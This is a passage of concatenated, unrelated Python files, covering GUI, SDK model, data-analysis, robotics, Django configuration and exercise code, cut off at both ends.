sticky=W) t1 = Text(root, height=1, width=10,fg="black") t1.grid(row=11, column=1, padx=10) S2Lb = Label(root, text=" Pulsation:", fg="black",) S2Lb.grid(row=12, column=1, pady=10, sticky=W) t1 = Text(root, height=1, width=10,fg="black") t1.grid(row=12, column=1, padx=10) S2Lb = Label(root, text=" Temperature:", fg="black",) S2Lb.grid(row=13, column=1, pady=10, sticky=W) t1 = Text(root, height=1, width=10,fg="black") t1.grid(row=13, column=1, padx=10) S2Lb = Label(root, text=" Respiration Rate", fg="black",) S2Lb.grid(row=14, column=1, pady=10, sticky=W) t1 = Text(root, height=1, width=10,fg="black") t1.grid(row=14, column=1, padx=10) S2Lb = Label(root, text=" Cholestrol:", fg="black",) S2Lb.grid(row=15, column=1, pady=10, sticky=W) t1 = Text(root, height=1, width=10,fg="black") t1.grid(row=15, column=1, padx=10) OPTIONS3= sorted(AGE) OPTIONS2= sorted(GENDER) OPTIONS = sorted(SYMPTOMPS) GLb = Label(root, text="Gender:", fg="black") GLb.config(font=("Elephant", 12)) GLb.grid(row=5, column=1, pady=10, sticky=W) GEn = OptionMenu(root, Gender,*OPTIONS2) GEn.grid(row=5, column=1, columnspan=2) ALb = Label(root, text="Age:", fg="black") ALb.config(font=("Elephant", 12)) ALb.grid(row=6, column=1, pady=10, sticky=W) S0En = OptionMenu(root, Age,*OPTIONS3) S0En.grid(row=6, column=1, columnspan=2) S1Lb = Label(root, text="Symptom 1:", fg="black") S1Lb.grid(row=6, column=0, pady=10, sticky=W) S1En = OptionMenu(root, Symptom1,*OPTIONS) S1En.grid(row=7, column=0) S2Lb = Label(root, text="Symptom 2:", fg="black",) S2Lb.grid(row=8, column=0, pady=10, sticky=W) S2En = OptionMenu(root, Symptom2,*OPTIONS) S2En.grid(row=9, column=0) S3Lb = Label(root, text="Symptom 3:", fg="black") S3Lb.grid(row=10, column=0, pady=10, sticky=W) S3En = OptionMenu(root, Symptom3,*OPTIONS) S3En.grid(row=11, column=0) S4Lb = Label(root, text="Symptom 4:", fg="black") S4Lb.grid(row=12, column=0, pady=10, sticky=W) S4En = OptionMenu(root, Symptom4,*OPTIONS) S4En.grid(row=13, column=0) S5Lb = Label(root, text="Symptom 5:", fg="black") S5Lb.grid(row=14, column=0, pady=10, sticky=W) S5En = OptionMenu(root, Symptom5,*OPTIONS) S5En.grid(row=15, column=0) lrLb = Label(root, text=" Predction1:", fg="white", bg="red") lrLb.grid(row=16, column=0, pady=10,sticky=W) dst = Button(root, text="Prediction1", command=DecisionTree,fg="blue") dst.grid(row=16, column=3,padx=10) t1 = Text(root, height=1, width=40,fg="black") t1.grid(row=16, column=1, padx=10) destreeLb = Label(root, text=" Prediction2:", fg="white", bg="red") destreeLb.grid(row=17, column=0, pady=10, sticky=W) rnf = Button(root, text="Prediction2", command=randomforest,fg="blue") rnf.grid(row=17, column=3,padx=10) t2 = Text(root, height=1, width=40,fg="black") t2.grid(row=17, column=1 , padx=10) ranfLb = Label(root, text=" Prediction3:", fg="white", bg="red") ranfLb.grid(row=18, column=0, pady=5, sticky=W) lr = Button(root, text="Prediction3", command=NaiveBayes,fg="blue") lr.grid(row=18, column=3,padx=10) t3 = Text(root, height=1, width=40,fg="black") t3.grid(row=18, column=1 , padx=10) rnf = Button(root, text="GO TO IMAGE DISEASE PREDICTION PAGE", command= openNewWindow ,fg="blue") rnf.grid(row=1, column=3,padx=10) rnf = Button(root, text="PREDICT FOR IMAGE",fg="blue") rnf.grid(row=5, column=3,padx=10) rnf1 = Button(root, text="SAVE",fg="blue") rnf1.grid(row=7, column=3,padx=10) root.mainloop()
# -*- coding: utf-8 -*- ''' # Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information. # # This file was generated and any changes will be overwritten. ''' from __future__ import unicode_literals from ..model.item_body import ItemBody from ..model.recipient import Recipient from ..model.extension import Extension from ..model.attachment import Attachment from ..model.single_value_legacy_extended_property import SingleValueLegacyExtendedProperty from ..model.multi_value_legacy_extended_property import MultiValueLegacyExtendedProperty from datetime import datetime from ..one_drive_object_base import OneDriveObjectBase class Post(OneDriveObjectBase): def __init__(self, prop_dict={}): self._prop_dict = prop_dict @property def body(self): """ Gets and sets the body Returns: :class:`ItemBody<onedrivesdk.model.item_body.ItemBody>`: The body """ if "body" in self._prop_dict: if isinstance(self._prop_dict["body"], OneDriveObjectBase): return self._prop_dict["body"] else : self._prop_dict["body"] = ItemBody(self._prop_dict["body"]) return self._prop_dict["body"] return None @body.setter def body(self, val): self._prop_dict["body"] = val @property def received_date_time(self): """ Gets and sets the receivedDateTime Returns: datetime: The receivedDateTime """ if "receivedDateTime" in self._prop_dict: return datetime.strptime(self._prop_dict["receivedDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f") else: return None @received_date_time.setter def received_date_time(self, val): self._prop_dict["receivedDateTime"] = val.isoformat()+"Z" @property def has_attachments(self): """ Gets and sets the hasAttachments Returns: bool: The hasAttachments """ if "hasAttachments" in self._prop_dict: return self._prop_dict["hasAttachments"] else: return None @has_attachments.setter def has_attachments(self, val): self._prop_dict["hasAttachments"] = val @property def from(self): """ Gets and sets the from Returns: :class:`Recipient<onedrivesdk.model.recipient.Recipient>`: The from """ if "from" in self._prop_dict: if isinstance(self._prop_dict["from"], OneDriveObjectBase): return self._prop_dict["from"] else : self._prop_dict["from"] = Recipient(self._prop_dict["from"]) return self._prop_dict["from"] return None @from.setter def from(self, val): self._prop_dict["from"] = val @property def sender(self): """ Gets and sets the sender Returns: :class:`Recipient<onedrivesdk.model.recipient.Recipient>`: The sender """ if "sender" in self._prop_dict: if isinstance(self._prop_dict["sender"], OneDriveObjectBase): return self._prop_dict["sender"] else : self._prop_dict["sender"] = Recipient(self._prop_dict["sender"]) return self._prop_dict["sender"] return None @sender.setter def sender(self, val): self._prop_dict["sender"] = val @property def conversation_thread_id(self): """ Gets and sets the conversationThreadId Returns: str: The conversationThreadId """ if "conversationThreadId" in self._prop_dict: return self._prop_dict["conversationThreadId"] else: return None @conversation_thread_id.setter def conversation_thread_id(self, val): self._prop_dict["conversationThreadId"] = val @property def new_participants(self): """Gets and sets the newParticipants Returns: :class:`NewParticipantsCollectionPage<onedrivesdk.request.new_participants_collection.NewParticipantsCollectionPage>`: The newParticipants """ if "newParticipants" in self._prop_dict: return NewParticipantsCollectionPage(self._prop_dict["newParticipants"]) else: return None @property def conversation_id(self): """ Gets and sets the conversationId Returns: str: The conversationId """ if "conversationId" in self._prop_dict: return self._prop_dict["conversationId"] else: return None @conversation_id.setter def conversation_id(self, val): self._prop_dict["conversationId"] = val @property def extensions(self): """Gets and sets the extensions Returns: :class:`ExtensionsCollectionPage<onedrivesdk.request.extensions_collection.ExtensionsCollectionPage>`: The extensions """ if "extensions" in self._prop_dict: return ExtensionsCollectionPage(self._prop_dict["extensions"]) else: return None @property def in_reply_to(self): """ Gets and sets the inReplyTo Returns: :class:`Post<onedrivesdk.model.post.Post>`: The inReplyTo """ if "inReplyTo" in self._prop_dict: if isinstance(self._prop_dict["inReplyTo"], OneDriveObjectBase): return self._prop_dict["inReplyTo"] else : self._prop_dict["inReplyTo"] = Post(self._prop_dict["inReplyTo"]) return self._prop_dict["inReplyTo"] return None @in_reply_to.setter def in_reply_to(self, val): self._prop_dict["inReplyTo"] = val @property def attachments(self): """Gets and sets the attachments Returns: :class:`AttachmentsCollectionPage<onedrivesdk.request.attachments_collection.AttachmentsCollectionPage>`: The attachments """ if "attachments" in self._prop_dict: return AttachmentsCollectionPage(self._prop_dict["attachments"]) else: return None @property def single_value_extended_properties(self): """Gets and sets the singleValueExtendedProperties Returns: :class:`SingleValueExtendedPropertiesCollectionPage<onedrivesdk.request.single_value_extended_properties_collection.SingleValueExtendedPropertiesCollectionPage>`: The singleValueExtendedProperties """ if "singleValueExtendedProperties" in self._prop_dict: return SingleValueExtendedPropertiesCollectionPage(self._prop_dict["singleValueExtendedProperties"]) else: return None @property def multi_value_extended_properties(self): """Gets and sets the multiValueExtendedProperties Returns: :class:`MultiValueExtendedPropertiesCollectionPage<onedrivesdk.request.multi_value_extended_properties_collection.MultiValueExtendedPropertiesCollectionPage>`: The multiValueExtendedProperties """ if "multiValueExtendedProperties" in self._prop_dict: return MultiValueExtendedPropertiesCollectionPage(self._prop_dict["multiValueExtendedProperties"]) else: return None
''' Remove outliers При анализе данных, собранных в рамках научного эксперимента, бывает полезно удалить самое большое и самое маленькое значение. На вход программе подается натуральное число n, а затем n различных натуральных чисел. Напишите программу, которая удаляет наименьшее и наибольшее значение из указанных чисел, а затем выводит оставшиеся числа каждое на отдельной строке, не меняя их порядок. --- Формат входных данных На вход программе подаются натуральное число nn, а затем nn различных натуральных чисел, каждое на отдельной строке. Формат выходных данных Программа должна вывести текст в соответствии с условием задачи. Sample Input: 10 9 17 189 3 55 78 11 7 888 160 Sample Output: 9 17 189 55 78 11 7 160 ''' n = int(input()) numlist = [] for i in range(n): numlist.append(int(input())) index_max = numlist.index(max(numlist)) del numlist[index_max] index_min = numlist.index(min(numlist)) del numlist[index_min] for i in numlist: print(i)
# Abrindo arquivo em modo de Leitura arquivo = open('notas_alunos.txt', 'r') lista_notas = [] # Lendo a primeira linha do arquivo conteudo = arquivo.readline() # Adicionando a primeira linha do arquivo na lista_notas # Removendo '\n' com [:-1] e separando as informações # com split (caractere de separação ';') linha = conteudo[:-1].split(';') lista_notas.append(linha) while conteudo: # Lendo uma linha do arquivo a cada iteração do WHILE conteudo = arquivo.readline() # Adicionando a linha do arquivo na lista_notas # Removendo '\n' com [:-1] e separando as informações # com split (caractere de separação ';' linha = conteudo[:-1].split(';') lista_notas.append(linha) # Fechando o Arquivo arquivo.close() # Removendo a última posição da lista lista_notas.pop() # Calculando as Médias for contador in range(0, len(lista_notas)): matricula = lista_notas[contador][0] nota_1 = float(lista_notas[contador][1]) nota_2 = float(lista_notas[contador][2]) nota_3 = float(lista_notas[contador][3]) nota_4 = float(lista_notas[contador][4]) media = (nota_1 + nota_2 + nota_3 + nota_4)/4 print('{0};{1:.2f};{2:.2f};{2:.2f};{3:.2f};{4:.2f}'.format(matricula,nota_1,nota_2,nota_3,nota_4,media))
#!/usr/bin/env python """ .. module:: elasticity :platform: Unix, Windows, Mac, Linux :synopsis: This module can be used to check the validity of input elasticity for 11 Laue classes. .. moduleauthor:: Qi Zhang <singularitti@outlook.com> """ import abc import warnings import numpy as np __all__ = [ 'StiffnessMatrix', 'CubicSystemStiffnessMatrix', 'HexagonalSystemStiffnessMatrix', 'TetragonalSystemStiffnessMatrix', 'RhombohedralSystemStiffnessMatrix', 'OrthorhombicSystemStiffnessMatrix', 'MonoclinicSystemStiffnessMatrix', 'TriclinicSystemStiffnessMatrix' ] class StiffnessMatrix: def __init__(self, stiffness_matrix): stiffness_matrix = np.array(stiffness_matrix, dtype=np.float64) if stiffness_matrix.shape != (6, 6): raise ValueError("Your *elastic_matrix* must have a shape of (6, 6)!") self._stiffness_matrix = stiffness_matrix self._eps = 1e-8 @property def eps(self): return self._eps @eps.setter def eps(self, value): if not isinstance(value, (int, float)): raise TypeError("The `eps` attribute has to be a number!") if abs(value) > 1: warnings.warn("The value of `eps` attribute may be too large!", stacklevel=2) self._eps = value @property @abc.abstractmethod def symmetry_conditions_text(self): ... @property @abc.abstractmethod def symmetry_conditions(self): ... def validate(self, outfile=None): flag = True for criterion, criterion_text in zip(self.symmetry_conditions, self.symmetry_conditions_text): if not criterion: # If `criterion` evaluates to `False`. print("Criterion ${0}$ is not satisfied!".format(criterion_text), file=outfile) flag = False return flag @property def stiffness_matrix(self): return self._stiffness_matrix @property def compliance_matrix(self): return np.linalg.inv(self._stiffness_matrix) class CubicSystemStiffnessMatrix(StiffnessMatrix): @property def symmetry_conditions_text(self): return [ "C_{11} = C_{22} = C_{33}", "C_{44} = C_{55} = C_{66}", "C_{12} = C_{13} = C_{23} = C_{21} = C_{31} = C_{32}", ] @property def symmetry_conditions(self): c = self._stiffness_matrix eps = self.eps d = np.diag(c) arr = np.array(c[0, 1], c[0, 2], c[1, 2], c[1, 0], c[2, 0], c[2, 1]) return [ np.isclose(d[0:3].min(), d[0:3].max(), atol=eps), np.isclose(d[3:6].min(), d[3:6].max(), atol=eps), np.isclose(arr.min(), arr.max(), atol=eps) ] class HexagonalSystemStiffnessMatrix(StiffnessMatrix): @property def symmetry_conditions_text(self): return [ "C_{11} = C_{22}", "C_{44} = C_{55}", "C_{13} = C_{23}", "C_{66} = 1 / 2 (C_{11} - C_{12})" ] @property def symmetry_conditions(self): c = self._stiffness_matrix eps = self.eps return [ np.isclose(c[0, 0], c[1, 1], atol=eps), np.isclose(c[3, 3], c[4, 4], atol=eps), np.isclose(c[0, 2], c[1, 2], atol=eps), np.isclose(c[5, 5], 0.5 * (c[0, 0] - c[0, 1]), atol=eps) ] class TetragonalSystemStiffnessMatrix(StiffnessMatrix): @property def symmetry_conditions_text(self): if self._stiffness_matrix[0, 5] == 0: # Tetragonal (I) class return [ "C_{11} = C_{22}", "C_{44} = C_{55}", "C_{13} = C_{23}", ] return [ # Tetragonal (II) class "C_{11} = C_{22}", "C_{44} = C_{55}", "C_{13} = C_{23}", "C_{16} = -C_{26}" ] @property def symmetry_conditions(self): c = self._stiffness_matrix eps = self.eps if self._stiffness_matrix[0, 5] == 0: # Tetragonal (I) class return [ np.isclose(c[0, 0], c[1, 1], atol=eps), np.isclose(c[3, 3], c[4, 4], atol=eps), np.isclose(c[0, 2], c[1, 2], atol=eps), ] return [ np.isclose(c[0, 0], c[1, 1], atol=eps), np.isclose(c[3, 3], c[4, 4], atol=eps), np.isclose(c[0, 2], c[1, 2], atol=eps), np.isclose(c[0, 5], -c[1, 5], atol=eps) ] class RhombohedralSystemStiffnessMatrix(StiffnessMatrix): @property def symmetry_conditions_text(self): if self._stiffness_matrix[0, 4] == 0: # Rhombohedral (I) class return [ "C_{11} == C_{22}", "C_{44} = C_{55}", "C_{13} = C_{23}", "C_{66} = 1 / 2 (C_{11} - C_{12})", "C_{14} = -C_{24} = -C_{56}" ] return [ # Rhombohedral (II) class "C_{11} == C_{22}", "C_{44} = C_{55}", "C_{13} = C_{23}", "C_{66} = 1 / 2 (C_{11} - C_{12})", "C_{14} = -C_{24} = -C_{56}", "-C_{15} = C_{25} = C_{46}" ] @property def symmetry_conditions(self): c = self._stiffness_matrix eps = self.eps if self._stiffness_matrix[0, 4] == 0: # Rhombohedral (I) class return [ np.isclose(c[0, 0], c[1, 1], atol=eps), np.isclose(c[3, 3], c[4, 4], atol=eps), np.isclose(c[0, 2], c[1, 2], atol=eps), np.isclose(c[5, 5], 0.5 * (c[0, 0] - c[0, 1]), atol=eps), np.isclose(c[0, 3], -c[1, 3], atol=eps) and np.isclose(c[0, 3], -c[4, 5], atol=eps) ] return [ # Rhombohedral (II) class np.isclose(c[0, 0], c[1, 1], atol=eps), np.isclose(c[3, 3], c[4, 4], atol=eps), np.isclose(c[0, 2], c[1, 2], atol=eps), np.isclose(c[5, 5], 0.5 * (c[0, 0] - c[0, 1]), atol=eps), np.isclose(c[0, 3], -c[1, 3], atol=eps) and np.isclose(c[0, 3], -c[4, 5], atol=eps), np.isclose(c[1, 4], -c[0, 4], atol=eps) and np.isclose(c[3, 5], -c[0, 4], atol=eps) ] class OrthorhombicSystemStiffnessMatrix(StiffnessMatrix): @property def symmetry_conditions_text(self): return [ "C_{14} = C_{24} = C_{34} = 0", "C_{15} = C_{25} = C_{35} = C_{45} = 0", "C_{16} = C_{26} = C_{36} = C_{46} = C_{56} = 0" "There are 9 independent values." ] @property def symmetry_conditions(self): c = self._stiffness_matrix eps = self.eps return [ np.allclose(c[0:3, 3], np.full(3, 0), atol=eps), np.allclose(c[0:4, 4], np.full(4, 0), atol=eps), np.allclose(c[0:5, 5], np.full(5, 0), atol=eps), len(np.unique(c)) == 9 ] class MonoclinicSystemStiffnessMatrix(StiffnessMatrix): @property def symmetry_conditions_text(self): return [ "C_{14} = C_{24} = C_{34} = 0", "C_{45} = 0", "C_{16} = C_{26} = C_{36} = C_{56} = 0", "There are 13 independent values." ] @property def symmetry_conditions(self): c = self._stiffness_matrix eps = self.eps return [ np.allclose(c[0:3, 3], np.full(3, 0), atol=eps), abs(c[3, 4]) < eps, np.allclose(c[0:3, 5], np.full(3, 0), atol=eps) and abs(c[4, 5]) < eps, len(np.unique(c)) == 13 ] class TriclinicSystemStiffnessMatrix(StiffnessMatrix): @property def symmetry_conditions_text(self): return [ "There are 21 independent values." ] @property def symmetry_conditions(self): c = self._stiffness_matrix return [ len(np.unique(c)) == 21 ]
#!/usr/bin/env python import roslib import sys import rospy import cv2 from std_msgs.msg import String from sensor_msgs.msg import Image, CameraInfo from cv_bridge import CvBridge, CvBridgeError import message_filters import os class image_converter: def __init__(self, FILE_DIR): # self.rgb_sub = rospy.Subscriber("/kinect2/hd/image_color_rect",Image) # self.d_sub = rospy.Subscriber("/kinect2/hd/image_depth_rect",Image) self.FILE_DIR = FILE_DIR self.rgb_sub = message_filters.Subscriber("/kinect2/qhd/image_color_rect",Image) self.d_sub = message_filters.Subscriber("/kinect2/qhd/image_depth_rect",Image) self.time_sync = message_filters.TimeSynchronizer([self.rgb_sub,self.d_sub],10) self.time_sync.registerCallback(self.rgbd_callback) self.rgb_counter = 0 self.d_counter = 0 self.count = 0 self.bridge = CvBridge() def rgbd_callback(self,data_rgb,data_d): try: rgb_img = self.bridge.imgmsg_to_cv2(data_rgb,"bgr8") except CvBridgeError as e: print(e) try: d_img = self.bridge.imgmsg_to_cv2(data_d,"passthrough") except CvBridgeError as e: print(e) # cv2.imwrite("RGB_{0}.png".format(self.rgb_counter),rgb_img) # cv2.imwrite("Depth_{0}.png".format(self.d_counter),d_img) cv2.imwrite(os.path.join(self.FILE_DIR,"RGB_{0}.png".format(self.rgb_counter)),rgb_img) cv2.imwrite(os.path.join(self.FILE_DIR,"Depth_{0}.png".format(self.d_counter)),d_img) self.rgb_counter += 1 self.d_counter += 1 print("FRAME:", self.rgb_counter) def main(argv): FILE_DIR = str(sys.argv[1]) ic = image_converter(FILE_DIR) rospy.init_node('Img_Conv',anonymous=True) try: rospy.spin() except KeyboardInterrupt: print("Shutting Down.") cv2.destroyAllWindows() if __name__ == '__main__': main(sys.argv)
from datastreams.postprocess import filtering, entities from discovery.oca_definitions import * from discovery.kernel_constants import * from discovery.syscall_numbers import * from ctypes import * class straceFilter(filtering.Filter): def initialize(self): self.systemCall_ptr = self.get_ns_pointer("SYSCALL/SYSTEM_CALL") self.sys_tr_filter_ptr = self.get_ns_pointer("SYSCALL/SYS_TR_FILTER") self.sys_char_ptr = self.get_ns_pointer("SYSCALL/SYS_CHAR") self.sys_stat64_ptr = self.get_ns_pointer("SYSCALL/SYS_STAT") self.syscallNames = getNumbersToSysCallNames() self.charValues = {} self.stat64Values = {} self.results = [] def process(self, entity): if entity.get_cid() == self.systemCall_ptr.get_cid(): data = entity.get_extra_data() # print "Name : ", data["name"] # print "Arguments : ", data["raw_params"] metadata = getSyscallMetadata(data["nr"]) if metadata is None: return dict = {} dict["sys_name"] = metadata["sys_name"] argValue = [] for i in range(metadata["numberArgs"]): if metadata['argTypes'][i] is "char": argValue.append(self.charValues[data["nr"]][0]) del self.charValues[data["nr"]][0] # elif metadata['argTypes'][i] is "struct stat64": # argValue.append(self.stat64Values[data["nr"]][0]) # del self.stat64Values[data["nr"]][0] else: argValue.append(data["raw_params"][i]) if data["nr"] in self.charValues.keys(): del self.charValues[data["nr"]] # if data["nr"] in self.stat64Values.keys(): # del self.stat64Values[data["nr"]] dict["arg_values"] = argValue self.results.append(dict) elif entity.get_cid() == self.sys_char_ptr.get_cid(): data = entity.get_extra_data() tag = entity.get_tag() if not tag in self.charValues.keys(): list = [] list.append(data) self.charValues[tag] = list else: list = self.charValues[tag] list.append(data) self.charValues[tag] = list # elif entity.get_cid() == self.sys_stat64_ptr.get_cid(): # data = entity.get_extra_data() # tag = entity.get_tag() # if not tag in self.stat64Values.keys(): # list = [] # list.append(data) # self.stat64Values[tag] = list # else: # list = self.stat64Values[tag] # list.append(data) # self.stat64Values[tag] = list elif entity.get_cid() == self.sys_tr_filter_ptr.get_cid(): data = entity.get_extra_data() # print "Event from the Filter :", self.syscallNames[data] def finalize(self): for syscallInfo in self.results: counter = 0 print syscallInfo["sys_name"],"(", for value in syscallInfo["arg_values"]: counter = counter + 1 if counter == len(syscallInfo["arg_values"]): print value, else: print value,",", print ")" # print counter, len(syscallInfo["arg_values"]) print "System call postprocessing complete."
from PyObjCTools.TestSupport import TestCase import objc import GameplayKit class TestGKAgent(TestCase): def testProtocols(self): objc.protocolNamed("GKAgentDelegate") def testMethods(self): self.assertResultIsBOOL(GameplayKit.GKAgent3D.rightHanded) self.assertArgIsBOOL(GameplayKit.GKAgent3D.setRightHanded_, 0)
#!/usr/bin/env python # USAGE # python ***.py --shape-predictor shape_predictor_68_face_landmarks.dat # import the necessary packages from scipy.spatial import distance as dist from imutils.video import FileVideoStream from imutils.video import VideoStream from imutils import face_utils import numpy as np import argparse import imutils import time import dlib import cv2 def mouth_openness(mouth, outer_lips=True): # use idx=3,9 for outer lips, idx=14,18 for inner lips # use idx=0,6 for outer lip edges, idx=12,16 for inner lip edges if outer_lips: a = dist.euclidean(mouth[3], mouth[9]) b = dist.euclidean(mouth[0], mouth[6]) r = a/b else: a = dist.euclidean(mouth[14], mouth[18]) b = dist.euclidean(mouth[12], mouth[16]) r = a/b return r # construct the argument parse and parse the arguments ap = argparse.ArgumentParser() ap.add_argument("-p", "--shape-predictor", required=True, help="path to facial landmark predictor") ap.add_argument("-v", "--video", type=str, default="", help="path to input video file") args = vars(ap.parse_args()) # initialize dlib's face detector (HOG-based) and then create # the facial landmark predictor print("[INFO] loading facial landmark predictor...") detector = dlib.get_frontal_face_detector() predictor = dlib.shape_predictor(args["shape_predictor"]) # grab the indexes of the facial landmarks for the mouth (mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS["mouth"] # [48,68] whole mouth [61,68] mouth hole (mhStart, mhEnd) = (61,68) # start the video stream thread print("[INFO] starting video stream thread...") #vs = FileVideoStream(args["video"]).start() #fileStream = True vs = VideoStream(src=0).start() # vs = VideoStream(usePiCamera=True).start() fileStream = False time.sleep(1.0) # loop over frames from the video stream while True: # if this is a file video stream, then we need to check if # there any more frames left in the buffer to process if fileStream and not vs.more(): break # grab the frame from the threaded video file stream, resize # it, and convert it to grayscale # channels) frame = vs.read() frame = imutils.resize(frame, width=450) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # detect faces in the grayscale frame rects = detector(gray, 0) # loop over the face detections for rect in rects: # determine the facial landmarks for the face region, then # convert the facial landmark (x, y)-coordinates to a NumPy # array shape = predictor(gray, rect) shape = face_utils.shape_to_np(shape) # extract the left and right eye coordinates, then use the # coordinates to compute the eye aspect ratio for both eyes mouth = shape[mStart:mEnd] mouth_open_dist = mouth_openness(mouth) #mouth_inner_open_dist = mouth_openness(mouth, outer_lips=False) # compute the convex hull for the left and right eye, then # visualize each of the eyes mouthHull = cv2.convexHull(mouth) cv2.drawContours(frame, [mouthHull], -1, (0, 255, 0), 1) # draw the computed mouth openness for the frame cv2.putText(frame, "Outer Lips Dist: {:.2f}".format(mouth_open_dist), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2) # show the frame cv2.imshow("Frame", frame) key = cv2.waitKey(1) & 0xFF # if the `q` key was pressed, break from the loop if key == ord("q"): break # do a bit of cleanup cv2.destroyAllWindows() vs.stop()
from __future__ import absolute_import, division, print_function import os import sys from setuptools import find_packages, setup PROJECT_PATH = os.path.dirname(os.path.abspath(__file__)) setup( name='d3p', python_requires='>=3.6', version='0.2.0-devel', description='Differentially-Private Probabilistic Programming', packages=find_packages(include=['d3p', 'd3p.*']), author='PADS @ Helsinki University and Aalto University', install_requires=[ 'numpyro >= 0.4.0, < 0.6.0', 'fourier-accountant >= 0.12.0, < 1.0.0' ], extras_require={ 'examples': ['matplotlib'], }, long_description="", long_description_content_type='text/markdown', tests_require=[], test_suite='tests', keywords='probabilistic machine learning bayesian statistics differential-privacy', classifiers=[ 'Intended Audience :: Developers', 'Intended Audience :: Education', 'Intended Audience :: Science/Research', 'Operating System :: POSIX :: Linux', 'Operating System :: MacOS :: MacOS X', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', ], )
# https://github.com/encode/django-rest-framework import datetime REST_FRAMEWORK = { 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework_jwt.authentication.JSONWebTokenAuthentication', 'rest_framework.authentication.SessionAuthentication', ), 'DEFAULT_PERMISSION_CLASSES': ('apps.api.v1.permissions.ObjectPermissions',), 'DEFAULT_RENDERER_CLASSES': ('rest_framework.renderers.JSONRenderer',), 'DEFAULT_FILTER_BACKENDS': ( 'django_filters.rest_framework.DjangoFilterBackend', 'rest_framework_guardian.filters.DjangoObjectPermissionsFilter', 'rest_framework.filters.SearchFilter', 'rest_framework.filters.OrderingFilter', ), 'DEFAULT_THROTTLE_RATES': {}, 'OVERIDE_THROTTLE_RATES': {}, 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination', 'PAGE_SIZE': 10, 'EXCEPTION_HANDLER': 'apps.api.v1.exceptions.exception_handler', }
from django.urls import path, include from .views import ( game_details, games, game_state, manage_game, library, uploads, play, save_score, purchase_game, search, autosuggestion_search, autosuggestion_search_library ) urlpatterns = [ path('', games, name='games'), path('search/', search, name='search'), path('library/search/', search, name='search'), path('search/search-term/', autosuggestion_search, name='autosuggestion'), path('library/search/search-term/', autosuggestion_search_library, name='autosuggestion_library'), path('<int:game_id>/', game_details, name='game_details'), path('<int:game_id>/purchase/', purchase_game, name='purchase_game'), path('add/', manage_game, name='add_game'), path('uploads/', uploads, name='uploads'), path('<int:game_id>/play/', play, name='play'), path('<int:game_id>/save-score/', save_score, name='save_score'), path('<int:game_id>/state/', game_state, name='game_state'), path('library/', library, name='library'), path('<int:game_id>/edit/', manage_game, name='edit_game'), path('<int:game_id>/review/', include('apps.review.urls')), ]
for i in range(int(input())): n = int(input()) p = [] for j in range(n): p.append(input().split()) op = n for j in range(1,n): op ^=j print(op)
import numpy as np import pandas as pd import sklearn as sk from sklearn.model_selection import TimeSeriesSplit import matplotlib.pyplot as plt import matplotlib matplotlib.style.use('ggplot') from datetime import datetime, date empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)), (datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)), (datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)), (datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)), (datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)), (datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)), (datetime(year=2013,month=7,day=16),datetime(year=2013,month=7,day=23)), (datetime(year=2013,month=8,day=15),datetime(year=2013,month=8,day=22)), (datetime(year=2013,month=9,day=14),datetime(year=2013,month=9,day=21)), (datetime(year=2013,month=10,day=18),datetime(year=2013,month=10,day=25)), (datetime(year=2013,month=11,day=20),datetime(year=2013,month=11,day=27)), (datetime(year=2013,month=12,day=22),datetime(year=2013,month=12,day=29))] def rolling_stats(Aprime, method = "flat", decay = 0.01): A = np.array(Aprime) N = np.size(A) rolling_mean = 0 rolling_var = 0 if method == "flat": rolling_mean = np.sum(A) / N rolling_var = np.sum((A - rolling_mean)**2) / (N - 1) else: weights = np.exp(- decay * np.array(range(0, N))) B = A * weights rolling_mean = np.sum(B) / np.sum(weights) C = (A - rolling_mean)**2 * weights rolling_var = np.sum(C) / np.sum(weights) return rolling_mean, rolling_var def approx_svd(mat, k): U,s,V = np.linalg.svd(mat, full_matrices=False) S = np.diag(s[0:k]) return np.dot(U[:,0:k], np.dot(S, V[0:k,:])) def create_training_xy_day(df_week): ''' Create the matrix X and Y for the ML algorithms. Create here an Y corresponding to an entire day ''' X = np.array([]) Y = np.array([]) for w in range(0,len(df_week)-1): if np.sum(np.isnan(df_week[w]))==0 and np.sum(np.isnan(df_week[w+1,-48:]))==0: if len(X)==0: X = np.array([df_week[w]]) Y = np.array([df_week[w+1,-48:]]) else: X = np.append(X, [df_week[w]], axis=0) Y = np.append(Y, [df_week[w+1,-48:]], axis=0) return X,Y def create_training_xy_hour(df_week, hour, minute): ''' Create the matrix X and Y for the ML algorithms. Create here an Y corresponding to a unique slot ''' X = np.array([]) Y = np.array([]) for w in range(0,len(df_week)-1): if np.sum(np.isnan(df_week[w]))==0 and np.sum(np.isnan(df_week[w+1,-48:]))==0: if len(X)==0: X = np.array([df_week[w]]) Y = np.array([df_week[w+1,-48+2*hour+int(minute/30)]]) else: X = np.append(X, [df_week[w]], axis=0) Y = np.append(Y, df_week[w+1,-48+2*hour+int(minute/30)]) return X,Y def create_day_matrix(df, weekday, day_max = -1): ''' Create the matrix where a row corresponds to the day of the week equaling weekday, and each column to a time slot ''' result=np.array([]) # we start at week 1 of 2011 dates = df.index[96:] first_day = dates[0].weekday() decal = (7-first_day+weekday)%7 first_day = dates[decal*48] last_day = dates[-1].date() empty_weeks = [(datetime(year=2012,month=12,day=28),datetime(year=2013,month=1,day=4)), (datetime(year=2013,month=2,day=2),datetime(year=2013,month=2,day=9)), (datetime(year=2013,month=3,day=6),datetime(year=2013,month=3,day=13)), (datetime(year=2013,month=4,day=10),datetime(year=2013,month=4,day=17)), (datetime(year=2013,month=5,day=13),datetime(year=2013,month=5,day=20)), (datetime(year=2013,month=6,day=12),datetime(year=2013,month=6,day=19)), 